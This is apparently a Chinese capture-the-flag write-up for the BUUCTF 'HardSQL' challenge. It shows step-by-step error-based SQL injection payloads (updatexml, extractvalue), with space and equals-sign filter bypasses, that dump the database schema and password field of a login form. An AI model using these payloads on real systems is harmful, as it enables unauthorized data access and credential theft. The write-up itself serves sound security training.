题目
data:image/s3,"s3://crabby-images/6ae63/6ae633ad323c8e877c1efea6c73eeb420cba7467" alt=""
打开页面显示为
data:image/s3,"s3://crabby-images/0c9e1/0c9e1fce3f1bd19c65edb8fae41f8e0b50f24f7e" alt=""
查看源代码没有发现其他的提示信息,随便尝试一下
data:image/s3,"s3://crabby-images/82516/82516861b47598c193ce4adf5b21276e2cb212ec" alt=""
错误
data:image/s3,"s3://crabby-images/f4ae2/f4ae297e0e5088cbd17c5a2c0731fb5a275ee0fb" alt=""
题目名为hardsql,先来尝试有无sql注入存在
尝试输入单引号输入
data:image/s3,"s3://crabby-images/17da2/17da204c59729ed85caa79d466549dc6e137b9d8" alt=""
显示页面存在注入
data:image/s3,"s3://crabby-images/dd6bf/dd6bf798a505682a3c69a19503ca9fde7edc688f" alt=""
这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示
data:image/s3,"s3://crabby-images/9d030/9d0300db6cc88c0a71c32532d17cf376fab4eb1e" alt=""
上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤
data:image/s3,"s3://crabby-images/e52f8/e52f89cc2aa8e2079fbe4bc8eff1c2a797fa9384" alt=""
使用updatexml
通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出
先查询数据库,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123
data:image/s3,"s3://crabby-images/b9bc0/b9bc02ed25251ff5ef05a2191e0aa4517ed9676a" alt=""
可得知数据库名为geek
查询表,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123
data:image/s3,"s3://crabby-images/87fca/87fcaa76a4694c14c2126fc48fe6576c9286a608" alt=""
得到表
查字段,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123
data:image/s3,"s3://crabby-images/be4bf/be4bfcbb574ae51d21a6ecb08345458d5044596a" alt=""
可以得到字段名
然后查询想要的字段
构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123
发现flag显示不全,函数显示有字符数限制
data:image/s3,"s3://crabby-images/33cff/33cffc05b322552224e872924db82075dd50c9fa" alt=""
使用right可得到另一半
构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123
data:image/s3,"s3://crabby-images/9ba82/9ba8226723d8e9abff4dd4ff61bbd5cd73ddbbf7" alt=""
使用extractvalue()
这里空格和=没有,使用()代替空格,使用like代替=
查数据库
构造payload
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23
data:image/s3,"s3://crabby-images/50e1e/50e1ed060c5b75f201f811542191be82f3059d6e" alt=""
查表
构造payload
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
data:image/s3,"s3://crabby-images/c9baf/c9bafde9d03f2034935dd05ac3f38675b81c7555" alt=""
查字段
构造payload
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
data:image/s3,"s3://crabby-images/d8481/d8481c45e835460cc61f49919f5ba1b6ab688588" alt=""
查数据
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23
data:image/s3,"s3://crabby-images/c629b/c629bb8a8ce90000839a167ff1b6a9080b068e0d" alt=""
这里也是显示不全,按照上面的updatexml后的方法进行补全即可
参考文章链接:
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客